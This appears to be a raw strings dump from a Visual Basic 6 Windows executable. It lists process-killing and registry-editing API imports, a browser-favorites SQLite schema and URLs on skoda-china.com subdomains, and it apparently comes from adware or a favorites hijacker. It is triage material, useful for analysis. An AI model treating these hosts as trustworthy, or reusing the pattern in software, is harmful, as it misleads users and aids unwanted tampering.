_adj_fprem1
_adj_fptan
advapi32.dll
_allmul
aRsU	Rs
BRsqOQs
_CIatan
_CIcos
_CIexp
_CIlog
_CIsin
_CIsqrt
_CItan
CloseHandle
CreateMutexA
CREATE TABLE favorite(id INTEGER UNIQUE,url TEXT,title TEXT,type INTEGER(2),parentid INTEGER,nextid INTEGER,firstchildid INTEGER,titlewidth INTEGER,hitcount INTEGER,param1 INTEGER,param2 INTEGER,param3 INTEGER)/
CreateToolhelp32Snapshot
`.data
DeleteFileA
DllFunctionCall
dRsjWSs
DWfC0p98
Es6nTsu
FindWindowA
fqXGjH03Arr
GetTickCount
GetVersionExA
GPWZGt139CweQIkjJThQR
http://down.skoda-china.com/
http://hao.skoda-china.com/
http://jd.skoda-china.com/
http://tmall.skoda-china.com/
http://windows.skoda-china.com/
indexsqlite_autoindex_favorite_1favorite
JUPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
JUroot
KC38x42T6DA3YC5Bx4L
kernel32
LQsD~Ss
MSVBVM60.DLL
OpenProcess
Process32First
Process32Next
Qs0LRs6
Qsb>Rs
QsCaRs^
<QshrRs
Qs+oRs
Qs__Rs
Qs:_Rs
QsSuTsV
RegCloseKey
RegCreateKeyA
RegDeleteValueA
RegEnumKeyExA
RegOpenKeyA
RegQueryValueExA
RegSetValueExA
RsA^Rs
RsdjRsK
Rs{eRs
RsQhRs
Rsq:Ts
Rsr]Qs|5Ds
<Rs[rSs=
rsswymel
`RsucRs'
Rs"YSs
SQLite format 3
TerminateProcess
 Then rsswymel
!This program cannot be run in DOS mode.
TsrkSs
user32
uTsqbRs
Value h
vb6chs.dll
VBA6.DLL
__vbaAryConstruct2
__vbaAryCopy
__vbaAryDestruct
__vbaAryMove
__vbaAryVar
__vbaBoolVarNull
__vbaCastObj
__vbaChkstk
__vbaDateVar
__vbaErase
__vbaErrorOverflow
__vbaExceptHandler
__vbaFileClose
__vbaFileCloseAll
__vbaFileOpen
__vbaFPException
__vbaFpI4
__vbaFreeObj
__vbaFreeStr
__vbaFreeStrList
__vbaFreeVar
__vbaFreeVarList
__vbaGenerateBoundsError
__vbaHresultCheckObj
__vbaI2I4
__vbaI2Var
__vbaI4Abs
__vbaI4Var
__vbaInStr
__vbaInStrVar
__vbaLateMemCall
__vbaLateMemCallLd
__vbaLenBstr
__vbaLenBstrB
__vbaLsetFixstr
__vbaNew
__vbaNew2
__vbaObjSet
__vbaObjSetAddref
__vbaObjVar
__vbaOnError
__vbaPowerR8
__vbaPrintFile
__vbaPutOwner3
__vbaR4Var
__vbaR8Str
__vbaR8Var
__vbaRecAnsiToUni
__vbaRecUniToAnsi
__vbaRedim
__vbaSetSystemError
__vbaStrCat
__vbaStrCmp
__vbaStrComp
__vbaStrCopy
__vbaStrFixstr
__vbaStrI4
__vbaStrMove
__vbaStrR8
__vbaStrToAnsi
__vbaStrToUnicode
__vbaStrVarMove
__vbaStrVarVal
__vbaUbound
__vbaUI1I4
__vbaUI1Var
__vbaVar2Vec
__vbaVarAnd
__vbaVarCat
__vbaVarCmpEq
__vbaVarDup
__vbaVarSub
__vbaVarTstEq
__vbaVarTstGt
WaitForSingleObject
?zhttp://ju.skoda-china.com/
ZSsDZSs